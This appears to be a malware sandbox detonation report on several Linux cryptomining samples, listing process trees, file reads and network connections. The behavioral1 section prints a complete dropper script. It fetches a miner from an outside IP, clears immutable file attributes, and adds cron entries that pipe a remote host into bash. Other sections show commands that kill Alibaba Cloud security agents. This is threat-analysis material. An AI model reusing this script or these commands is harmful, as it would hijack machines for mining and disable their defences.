File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/664/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/356/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/715/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/150/cmdline /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/712/stat /usr/bin/killall N/A
File opened for reading /proc/223/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/396/stat /usr/bin/killall N/A
File opened for reading /proc/324/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

Processes

/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/429/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/248/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/687/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/359/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/330/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/124/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/679/stat /usr/bin/killall N/A
File opened for reading /proc/125/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/125/cmdline /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/735/stat /usr/bin/killall N/A
File opened for reading /proc/740/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/357/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/725/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/353/stat /usr/bin/killall N/A
File opened for reading /proc/125/stat /usr/bin/killall N/A
File opened for reading /proc/687/stat /usr/bin/killall N/A
File opened for reading /proc/724/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/706/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

149s

Max time network

153s

Command Line

[/tmp/xrx/xrx]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xrx/xrx N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xrx/xrx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xrx/xrx N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/types /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xrx/xrx N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/target_node /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/node/online /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cgroup.controllers /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset.mems.effective /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset.cpus.effective /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/xrx/xrx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/driver/nvidia/gpus /tmp/xrx/xrx N/A
File opened for reading /proc/mounts /tmp/xrx/xrx N/A
File opened for reading /proc/self/cpuset /tmp/xrx/xrx N/A
File opened for reading /proc/meminfo /tmp/xrx/xrx N/A

Processes

/tmp/xrx/xrx

[/tmp/xrx/xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 91.189.91.82:80 security.ubuntu.com tcp
GB 185.125.190.81:80 security.ubuntu.com tcp
US 91.189.91.82:80 security.ubuntu.com tcp
US 91.189.91.81:80 security.ubuntu.com tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

4s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/198/ctty /usr/bin/pgrep N/A
File opened for reading /proc/4/ctty /usr/bin/pgrep N/A
File opened for reading /proc/496/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/37/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2246/stat /usr/bin/pgrep N/A
File opened for reading /proc/2351/stat /usr/bin/pgrep N/A
File opened for reading /proc/36/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/53/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/32/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2019/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2256/stat /usr/bin/pgrep N/A
File opened for reading /proc/2018/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/777/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/189/stat /usr/bin/pgrep N/A
File opened for reading /proc/1724/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1751/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2547/ctty /usr/bin/pgrep N/A
File opened for reading /proc/36/stat /usr/bin/pgrep N/A
File opened for reading /proc/793/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2018/stat /usr/bin/pgrep N/A
File opened for reading /proc/1085/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2007/stat /usr/bin/pgrep N/A
File opened for reading /proc/189/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/755/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2309/ctty /usr/bin/pgrep N/A
File opened for reading /proc/24/stat /usr/bin/pgrep N/A
File opened for reading /proc/1132/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1865/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1265/stat /usr/bin/pgrep N/A
File opened for reading /proc/43/stat /usr/bin/pgrep N/A
File opened for reading /proc/34/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/514/ctty /usr/bin/pgrep N/A
File opened for reading /proc/338/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/863/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1083/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2182/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1/ctty /usr/bin/pgrep N/A
File opened for reading /proc/4/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/591/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1862/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2202/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2543/stat /usr/bin/pgrep N/A
File opened for reading /proc/2263/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2340/status /usr/bin/pgrep N/A
File opened for reading /proc/20/ctty /usr/bin/pgrep N/A
File opened for reading /proc/31/stat /usr/bin/pgrep N/A
File opened for reading /proc/42/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1103/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1919/status /usr/bin/pgrep N/A
File opened for reading /proc/2196/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2370/stat /usr/bin/pgrep N/A
File opened for reading /proc/11/ctty /usr/bin/pgrep N/A
File opened for reading /proc/47/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/53/ctty /usr/bin/pgrep N/A
File opened for reading /proc/55/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/194/status /usr/bin/pgrep N/A
File opened for reading /proc/1075/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/41/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/195/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/34/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2204/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2319/status /usr/bin/pgrep N/A
File opened for reading /proc/14/ctty /usr/bin/pgrep N/A

Processes

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' "$@" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." 
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/cat

[cat /etc/crontab]

/usr/bin/grep

[grep -q secure]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/sleep

[sleep 1]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:53

Platform

debian9-mipsel-20240611-en

Max time kernel

4s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

debian9-mipsel-20240611-en

Max time kernel

0s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

N/A

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

144s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]
